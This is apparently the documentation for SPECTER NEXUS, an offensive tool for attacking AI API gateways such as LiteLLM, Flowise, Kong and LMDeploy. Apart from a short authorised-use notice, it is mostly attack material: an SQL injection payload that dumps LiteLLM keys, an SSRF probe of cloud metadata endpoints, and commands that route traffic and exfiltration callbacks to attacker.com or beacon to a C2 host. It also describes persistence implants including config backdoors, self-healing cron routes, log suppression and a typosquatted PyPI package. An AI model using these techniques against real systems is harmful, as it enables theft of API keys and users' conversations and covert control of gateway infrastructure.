NIGHTFALL · Tool 97 · WMD-Class · AI API Gateway Exploitation

SPECTER NEXUS

AI API Gateway Exploitation Engine — targets LiteLLM, Ollama, Flowise, Open WebUI, Portkey, Kong AI Gateway, Traefik, Cloudflare AI Gateway, TrueFoundry, and LMDeploy. 7 CVEs and TTPs covering credential annihilation, route hijacking, and provider key mass exfiltration across all major AI infrastructure layers.

Version 1.0.0 · 20 May 2026 · Gate: OPEN / INJECT / UNLEASHED · Reports: NXS-{hex12}

239Tests

8Subsystems

10Platforms

7CVEs / TTPs

AUTHORISED USE ONLY. SPECTER NEXUS is a red team tool for authorised security engagements. PERSIST and EXFIL (live data transmission) require a valid Ed25519 UNLEASHED gate signature. Ensure you have explicit written authorisation from the target organisation before executing any INJECT or UNLEASHED-gate operations against AI gateway infrastructure.

Installation

# Clone and install
$ git clone https://github.com/RichardBarron27/red-specter-specter-nexus
$ cd red-specter-specter-nexus
$ pip install -e .

# Verify
$ specter-nexus --version
specter-nexus, version 1.0.0

# Initialise gate authentication
$ specter-nexus auth init
$ specter-nexus auth create-scope --target https://target.example.com
$ specter-nexus auth status

Gate Structure

Gate	Subsystems Enabled	Requirement
OPEN	SCAN, HARVEST, REPORT	No key required — passive enumeration only
INJECT	+ INJECT, ROUTE, PIVOT, EXFIL (canary staging)	Ed25519 INJECT signature + `--override` flag
UNLEASHED	+ PERSIST (gateway implants), EXFIL (live extraction), annihilate	Ed25519 UNLEASHED signature + `--i-understand-this-is-live-fire` flag

CLI Reference

Full Annihilation Pipeline

$ specter-nexus annihilate --target https://gateway.example.com \
    --operator red --confirm-destroy \
    --key ~/.red-specter/specter-nexus/operator.key

Options:
  --target TEXT             Target gateway URL
  --operator TEXT           Operator handle for report attribution
  --confirm-destroy         Required confirmation flag for UNLEASHED execution
  --key PATH                Path to NIGHTFALL Ed25519 private key
  --output TEXT             text | json | markdown  [default: text]
  --out-dir PATH            Report output directory  [default: .]

Auth Commands

# Initialise Ed25519 key pair in ~/.red-specter/specter-nexus/
$ specter-nexus auth init

# Create a time-limited engagement scope
$ specter-nexus auth create-scope --target https://litellm.corp.com --ttl 24

# Show current gate status and key info
$ specter-nexus auth status

SCAN — Gateway Fingerprinting

# Fingerprint a single target
$ specter-nexus scan target --target https://gateway.corp.com

# Scan a CIDR range for AI gateways
$ specter-nexus scan range --cidr 10.0.0.0/24 --port 4000

# Enumerate cloud subdomains for AI gateway services
$ specter-nexus scan subdomains --domain corp.com

HARVEST — Credential Extraction

# Extract all credentials from a target gateway
$ specter-nexus harvest creds --target https://litellm.corp.com

# Exploit CVE-2026-42208 (LiteLLM SQLite injection)
$ specter-nexus harvest cve-42208 --target https://litellm.corp.com

# Exploit CVE-2026-41264 (Flowise unauth RCE)
$ specter-nexus harvest cve-41264 --target https://flowise.corp.com

# Exploit CVE-2026-33626 (LMDeploy SSRF)
$ specter-nexus harvest cve-33626 --target https://lmdeploy.corp.com

INJECT — Payload Injection

# Inject adversarial system prompt into gateway pipeline (INJECT gate)
$ specter-nexus inject system-prompt --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key

# Deploy full MITM config to intercept all model requests (INJECT gate)
$ specter-nexus inject mitm-config --target https://gateway.corp.com \
    --exfil-endpoint https://attacker.com/collect \
    --key ~/.red-specter/specter-nexus/operator.key

ROUTE — Gateway Routing Hijack

# Inject rogue model alias to redirect traffic (INJECT gate)
$ specter-nexus route alias --target https://litellm.corp.com \
    --alias gpt-4o --upstream https://attacker.com/api \
    --key ~/.red-specter/specter-nexus/operator.key

# Inject callback exfiltration chain (INJECT gate)
$ specter-nexus route callback --target https://litellm.corp.com \
    --exfil-endpoint https://attacker.com/collect \
    --key ~/.red-specter/specter-nexus/operator.key

# Inject Kong upstream route (INJECT gate)
$ specter-nexus route kong --target https://kong.corp.com \
    --model gpt-4 --upstream https://attacker.com/shadow \
    --key ~/.red-specter/specter-nexus/operator.key

PIVOT — Key Validation & Inventory

# Validate harvested API keys (INJECT gate)
$ specter-nexus pivot validate --keys-file harvested_keys.json \
    --key ~/.red-specter/specter-nexus/operator.key

# Build provider inventory from valid keys (INJECT gate)
$ specter-nexus pivot inventory --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key

PERSIST — Gateway Implant Deployment

# Deploy wildcard rogue virtual key (UNLEASHED required)
$ specter-nexus persist virtual-key --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Plant startup beacon (UNLEASHED required)
$ specter-nexus persist beacon --target https://litellm.corp.com \
    --c2 https://c2.attacker.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Deploy config backdoor with attacker master key (UNLEASHED required)
$ specter-nexus persist config-backdoor --target https://litellm.corp.com \
    --master-key SECRET_KEY_HERE \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

EXFIL — Data Extraction

# Extract conversation logs (UNLEASHED required)
$ specter-nexus exfil logs --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Steal system prompts from gateway configs (UNLEASHED required)
$ specter-nexus exfil system-prompts --target https://gateway.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Extract spend telemetry and billing keys (UNLEASHED required)
$ specter-nexus exfil spend --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Full deep scan — all extraction paths (UNLEASHED required)
$ specter-nexus exfil deep-scan --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

REPORT — Signed Report Generation

# Build Ed25519-signed NXS-{hex12} report
$ specter-nexus report build --target https://gateway.corp.com \
    --operator red --format markdown --out-dir ./reports

# Verify report signature integrity
$ specter-nexus report verify NXS-a1b2c3d4e5f6.json

CVE Coverage

CVE-2026-42208 — LiteLLM SQLite Injection (CVSS 9.0)

SQL injection in LiteLLM's virtual key management endpoint. The /key/info endpoint fails to sanitise the key parameter before passing it to SQLite, enabling UNION SELECT attacks against the litellm_verificationtoken table. This table stores all virtual keys including master keys, team keys, and model-scoped keys. A single unauthenticated request can dump every API key and its associated spend limits.

# Exploit CVE-2026-42208 — dump all virtual keys
$ specter-nexus harvest cve-42208 --target https://litellm.corp.com
# Payload: ' UNION SELECT key_alias,key_name,key_value FROM litellm_verificationtoken--

CVE-2026-41264 — Flowise Unauthenticated RCE (CVSS 9.8)

Flowise's /api/v1/credentials endpoint is accessible without authentication in default deployments. Beyond credential exposure, a crafted POST body triggers path traversal in the credential storage handler, enabling arbitrary file write on the Flowise host. Combined with Flowise's JavaScript execution capability in custom function nodes, this achieves unauthenticated remote code execution without any user interaction.

# Exploit CVE-2026-41264 — extract credentials and test RCE
$ specter-nexus harvest cve-41264 --target https://flowise.corp.com \
    --mode poc

CVE-2026-33626 — LMDeploy SSRF (CVSS 9.1)

LMDeploy's model loading API accepts arbitrary URLs for remote model fetching. The URL parameter is passed directly to the download handler without SSRF filtering, allowing requests to internal network services including cloud metadata endpoints (169.254.169.254), Redis, PostgreSQL, and other internal APIs. In cloud environments this reliably yields IAM credentials, enabling full cloud account takeover from a single LMDeploy instance.

# Exploit CVE-2026-33626 — probe cloud metadata
$ specter-nexus harvest cve-33626 --target https://lmdeploy.corp.com \
    --target-ip 169.254.169.254

litellm_admin_bypass — LiteLLM Admin API Exposure (CVSS 8.5)

LiteLLM instances deployed without the LITELLM_MASTER_KEY environment variable default to an open admin API. The /admin/, /config/, and /models/ endpoints are accessible without authentication, allowing full configuration read/write including model routing tables, spend limits, and callback URLs.

ollama_open_bind — Ollama Open Network Binding (CVSS 7.5)

Ollama's default configuration binds to all interfaces (0.0.0.0). In cloud and containerised deployments this exposes the full Ollama API — including /api/pull (model download), /api/create (model creation from Modelfile), and /api/delete — to any network-reachable client without authentication.

kong_admin_api_exposed — Kong Admin API Exposure (CVSS 6.8)

Kong's admin API (default port 8001) grants full gateway control including service creation, route injection, plugin configuration, and certificate management. Misconfigured deployments expose this API on the public interface. SPECTER NEXUS exploits this to inject shadow routes that redirect AI model traffic to attacker-controlled upstreams while preserving normal gateway function.

teamcpcp_supply_chain — LiteLLM Supply Chain Attack (CVSS 8.8)

LiteLLM's plugin ecosystem accepts third-party callback handlers via pip install. A typosquatted package (litellm-utils vs litellm_utils) planted in PyPI intercepts all model requests and responses in the LiteLLM callback pipeline, operating silently alongside the legitimate package without causing visible errors.

Subsystem Architecture

SCAN — AI Gateway Fingerprinting

GatewayScanner uses httpx.AsyncClient with asyncio.gather for parallel multi-platform fingerprinting. PLATFORM_PROFILES defines 10 platform signatures with probe_paths, header_signatures, response_patterns, default_ports, applicable_cves, and wmd_potential. _identify_platform() returns a (platform, confidence) tuple. _extract_version() matches version strings from response bodies and headers. scan_target() returns a ScanResult with all discovered GatewayInstance objects. enumerate_subdomains() generates 20+ cloud provider subdomain patterns. CVE_MATRIX maps each CVE to affected platforms and base severity.

HARVEST — Credential Extraction

CredentialHarvester implements per-CVE extraction methods and a universal extract_keys_from_text(text, source) function. SECRET_PATTERNS covers 20+ compiled regex patterns: OpenAI (sk-(?:proj-)?), Anthropic (sk-ant-), Google AI (AIza), AWS (AKIA/AROA/ASIA), HuggingFace (hf_), Groq (gsk_), Replicate (r8_), Perplexity (pplx-), Voyage AI (pa-), JWTs, bearer tokens, and generic high-entropy API keys. SQL_PAYLOADS includes 10 LiteLLM SQLite injection strings targeting litellm_verificationtoken. SSRF_TARGETS covers 12 cloud metadata endpoints. FLOWISE_RCE_PAYLOADS builds path traversal payloads for unauth credential exposure.

INJECT — Adversarial Payload Injection

PayloadInjector builds InjectPayload objects for each attack vector. build_system_prompt_injection() crafts adversarial instructions targeting all 5 common system prompt injection patterns. build_response_tamper_payload() constructs a callback-based response interception chain. build_rate_limit_bypass_headers() generates 15 header combinations for rate limit evasion. build_model_param_override() builds model parameter override payloads that persist across sessions. build_full_mitm_config() generates a complete LiteLLM config YAML that routes all traffic through an attacker-controlled proxy while maintaining gateway function. fire(target_url, payload, gate) delivers payloads via httpx with gate validation.

ROUTE — Routing Table Hijacking

RouteHijacker implements gateway-specific route injection. build_model_alias_rule() creates a RouteRule that redirects a target model alias to an attacker upstream. build_load_balancer_injection() adds an attacker backend to existing load balancer pools. build_fallback_chain_poison() inserts an attacker upstream in fallback chains at a high priority weight. build_shadow_proxy_config() generates a complete shadow proxy configuration. build_cloudflare_worker_replacement() crafts a Cloudflare Worker script that intercepts and exfiltrates all AI requests. to_litellm_config_yaml() serialises rule sets to deployable LiteLLM YAML config. Supports LiteLLM, Kong, Cloudflare, and Traefik platforms.

PIVOT — Key Validation & Cross-Use Detection

KeyPivot validates harvested keys against live provider APIs. PROVIDER_VALIDATION_ENDPOINTS defines validation URLs, auth header patterns, and auth prefixes for 10 providers. validate_openai_key() queries /v1/models and extracts models_accessible and rate limit tier. validate_anthropic_key() probes /v1/messages with a minimal test message. validate_aws_key() implements manual SigV4 HMAC signing for bedrock:ListFoundationModels. validate_gemini_key() hits generativelanguage.googleapis.com/v1/models. detect_cross_use() flags keys that work on multiple provider APIs — a common misconfiguration in gateway deployments. run_batch_validation() uses asyncio semaphore for concurrent validation with configurable concurrency limit.

PERSIST — Gateway Implant Deployment (UNLEASHED)

Eight implant strategies gated behind UNLEASHED: rogue_virtual_key (wildcard * model access in litellm_verificationtoken), route_db_injection (SQLite INSERT INTO litellm_routingtable), webhook_callback (persistent exfil callback via success/failure hooks), startup_beacon (environment variable beacon triggered on container start), log_suppression (DELETE/UPDATE spend counters to hide malicious usage), config_backdoor (overwrites master_key with attacker-controlled base64 value), self_healing_route (cron entries that re-deploy every 5 minutes after detection), supply_chain_hook (typosquatted litellm-utils PyPI package intercepting callback pipeline). Each strategy includes survival notes, stealth guidance, and re-arm triggers.

EXFIL — Conversation & Config Extraction (UNLEASHED)

DataExfiltrator implements extraction across six categories in EXTRACTION_PATHS: conversation logs (7 paths targeting /logs/, /requests/, /chat/completions/history), system prompts (8 paths including /config/system_prompt, /v1/config/yaml), spend telemetry (6 paths for billing and usage data), model config (8 paths for full config dumps), user enumeration (7 paths for team and key listings), and deep secrets (10 paths for environment variables, database credentials, and signing keys). _parse_conversation_records() extracts ConversationRecord objects with session IDs, system prompts, messages, and API key hashes. ExfilResult.has_pii detects emails, phone numbers, and credit card patterns in extracted data.

Report Format

All reports are Ed25519-signed NXS-{hex12} format. The signing key is stored at ~/.red-specter/specter-nexus/operator.key (mode 0o600). The report includes:

Field	Contents
`report_id`	NXS-{12 hex chars} unique identifier
`timestamp`	ISO-8601 UTC
`target`	Target gateway URL
`operator`	Operator handle
`signature`	Ed25519 signature over report body (hex)
`findings`	List of `NexusFinding` objects with subsystem, title, severity, CVE, CVSS, gate, and evidence
`wmd_classes`	Activated WMD classes: gateway_credential_annihilation / provider_key_mass_exfil / gateway_route_hijack
`platforms_detected`	List of identified gateway platforms with versions
`cves_applicable`	Applicable CVEs for detected platforms with exploitability notes
`risk_score`	0.0–1.0 composite score (auto-floors at 0.85 for CRITICAL findings)
`mitre_atlas`	AML.T0043/T0051/T0054 with finding mappings
`owasp`	LLM01/LLM02/LLM06/LLM08 mappings

MITRE ATLAS & OWASP Mapping

Framework	Technique / Category	Subsystem
ATLAS AML.T0043	Craft Adversarial Data	INJECT, ROUTE
ATLAS AML.T0051	LLM Prompt Injection	INJECT
ATLAS AML.T0054	LLM Jailbreak	INJECT
OWASP LLM01	Prompt Injection	INJECT
OWASP LLM02	Sensitive Information Disclosure	HARVEST, EXFIL
OWASP LLM06	Excessive Agency	ROUTE, PERSIST
OWASP LLM08	Excessive Permissions	PIVOT, EXFIL

Research References

Reference	Relevance
CVE-2026-42208 (CVSS 9.0)	LiteLLM SQLite injection — HARVEST primary credential dump vector
CVE-2026-41264 (CVSS 9.8)	Flowise unauth RCE + credential exposure — HARVEST/INJECT
CVE-2026-33626 (CVSS 9.1)	LMDeploy SSRF to cloud metadata — HARVEST cloud IAM pivot
litellm_admin_bypass (CVSS 8.5)	LiteLLM open admin API — SCAN/ROUTE full config write access
ollama_open_bind (CVSS 7.5)	Ollama default open bind — SCAN/HARVEST unauth model API access
kong_admin_api_exposed (CVSS 6.8)	Kong admin API exposure — ROUTE shadow upstream injection
teamcpcp_supply_chain (CVSS 8.8)	LiteLLM typosquatting supply chain — PERSIST callback interception
OWASP LLM Top 10 2025	LLM01/LLM02/LLM06/LLM08 — REPORT framework mapping
MITRE ATLAS AML.T0043/T0051/T0054	Adversarial data, prompt injection, jailbreak — all active subsystems